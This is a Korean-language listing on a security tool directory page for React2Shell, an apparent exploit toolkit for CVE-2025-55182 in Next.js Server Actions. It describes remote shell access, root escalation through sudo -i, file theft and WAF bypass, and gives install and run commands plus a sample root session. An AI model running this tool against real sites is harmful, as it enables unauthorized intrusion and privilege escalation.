Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
React2Shell — Next.js Server Actions용 고급 익스플로잇 툴킷 (CVE-2025-55182) | Kitploit
도구/GitHubGitHub/xalgord/react2shell
Privilege EscalationPayload GenerationExploitationWeb Application ExploitationWAF BypassPenetration TestingCommand and ControlRed TeamingRemote Access Tool
GitHubxalgord/react2shell

React2Shell

Next.js Server Actions용 고급 익스플로잇 툴킷 (CVE-2025-55182)

51659개월 전Kitploit 검토 완료

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유
저장소 보기

⚛️ React2Shell (CVE-2025-55182)

Python License Vulnerability

Next.js Server Actions(CVE-2025-55182)를 위한 고급 익스플로잇 툴킷.

React2Shell은 React2Shell 취약점을 악용하도록 설계된 강력한 인터랙티브 셸 래퍼입니다. 단순한 RCE를 넘어 명령 기록, 파일 전송 기능, 자동화된 권한 상승 전략을 제공합니다.


🚀 기능

  • 단일 파일 실행: 익스플로잇 로직과 셸 인터페이스를 하나의 스크립트로 통합합니다. 외부 의존성이 없습니다.
  • 인터랙티브 셸: 명령 기록을 지원하는 완전한 의사 터미널 경험.
  • 자동 루트 권한 상승: 셸 제한을 우회하고 즉시 루트로 권한을 상승시키는 내장 파이프 주입 전략(base64 | sudo -i).
  • 파일 작업:
    • .download <remote> [local]: base64 인코딩을 사용한 안정적인 바이너리 안전 파일 다운로드.
    • .save: 명령 출력을 로컬 증거 파일로 저장.
  • Base64 우회: 기본 WAF 필터와 셸 따옴표 문제를 우회하도록 페이로드를 자동으로 인코딩합니다.

스크린샷

1 2

🛠️ 설치

root@kitploit:~
git clone https://github.com/xalgord/React2Shell.git
cd React2Shell
pip install requests

💻 사용법

기본 사용법

root@kitploit:~
python3 react2shell.py -u https://target-nextjs-site.com/

고급 사용법

검증된 루트 지속성 전략 탐지와 함께 실행:

root@kitploit:~
python3 react2shell.py -u https://target.com/

🎮 명령 인터페이스

셸에 진입한 후:

예시 세션

root@kitploit:~
ubuntu@target:~$ id
uid=1000(ubuntu) gid=1000(ubuntu) groups=1000(ubuntu)...

ubuntu@target:~$ .root
[*] Root mode ENABLED

root@target:~$ id
uid=0(root) gid=0(root) groups=0(root)

⚠️ 면책 조항

교육 목적으로만 사용하십시오. 이 도구는 보안 연구 및 승인된 테스트만을 위해 제작되었습니다. 저자는 이 도구로 인해 발생하는 오용이나 손해에 대해 책임을 지지 않습니다. 명시적 테스트 허가를 받지 않은 대상을 스캔하거나 악용하지 마십시오.


윤리적 침투 테스트 및 레드 팀 운영을 위해 개발되었습니다.

도구 다운로드
명령설명
.root루트 모드 전환(명령을 sudo -i로 래핑)
.download <file>원격 서버에서 파일 다운로드
.save마지막 명령의 출력을 파일로 저장
.exit셸 종료